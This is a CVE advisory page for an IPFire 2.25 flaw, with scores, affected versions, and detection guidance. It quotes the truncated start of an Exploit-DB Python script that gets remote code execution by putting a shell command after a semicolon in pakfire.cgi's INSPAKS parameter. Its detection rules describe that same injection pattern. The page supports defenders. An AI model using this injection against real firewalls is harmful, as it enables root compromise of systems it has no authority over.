CVE-2021-33393
published 2021-06-09CVE-2021-33393: lfs/backup in IPFire 2.25-core155 does not ensure that /var/ipfire/backup/bin/backup.pl is owned by the root account. It might be owned by an unprivileged…
PriorityP271high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
58.73%
99.0th percentile
lfs/backup in IPFire 2.25-core155 does not ensure that /var/ipfire/backup/bin/backup.pl is owned by the root account. It might be owned by an unprivileged account, which could potentially be used to install a Trojan horse backup.pl script that is later executed by root. Similar problems with the ownership/permissions of other files may be present as well.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipfire | ipfire | < 2.25 | 2.25 |
| ipfire | ipfire | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to /cgi-bin/pakfire.cgi where the INSPAKS parameter contains a semicolon (;), indicating command injection attempts appended to a package name. ↗
- →Alert on authenticated POST requests to /cgi-bin/pakfire.cgi with ACTION=install and INSPAKS values containing shell metacharacters (e.g., semicolons). ↗
- →Audit ownership and permissions of /var/ipfire/backup/bin/backup.pl; flag if not owned by root, as it may indicate a planted Trojan horse script. ↗
- →Detect the exploit's characteristic HTTP headers: presence of both 'Sec-GPC: 1' and 'Authorization: Basic ...' on POST requests to pakfire.cgi may indicate exploit tooling. ↗
- ·The exploit requires valid credentials (authenticated RCE); unauthenticated access alone is insufficient to trigger the vulnerability. Detection rules should account for the Basic Auth header being present. ↗
- ·The NVD description notes that similar ownership/permission problems may exist beyond backup.pl; a broader audit of IPFire file ownership is warranted. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IPFire 2.25 - Remote Code Execution (Authenticated)
exploitdb·2021-05-17·CVSS 8.8
CVE-2021-33393 [HIGH] IPFire 2.25 - Remote Code Execution (Authenticated)
IPFire 2.25 - Remote Code Execution (Authenticated)
---
# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393
#!/usr/bin/python3
import requests as R
import sys
import base64
try:
host = sys.argv[1]
assert host[:4] == "http" and host[-1] != "/"
url = host + "/cgi-bin/pakfire.cgi"
username = sys.argv[2]
password = sys.argv[3]
komut = sys.argv[4]
except:
print(f"{sys.argv[0]} http://target.com:444 username password command")
exit(1)
veri = {
"INSPAKS": f"7zip;{komut
Metasploit
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
metasploit
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/163158/IPFire-2.25-Remote-Code-Execution.htmlhttps://github.com/MucahitSaratar/ipfire-2-25-auth-rcehttps://github.com/ipfire/ipfire-2.x/commit/6769d909306d7bdc43d64598872126fcf1b217f6https://github.com/ipfire/ipfire-2.x/commits/master?since=2021-05-17&until=2021-05-17http://packetstormsecurity.com/files/163158/IPFire-2.25-Remote-Code-Execution.htmlhttps://github.com/MucahitSaratar/ipfire-2-25-auth-rcehttps://github.com/ipfire/ipfire-2.x/commit/6769d909306d7bdc43d64598872126fcf1b217f6https://github.com/ipfire/ipfire-2.x/commits/master?since=2021-05-17&until=2021-05-17
2021-06-09
Published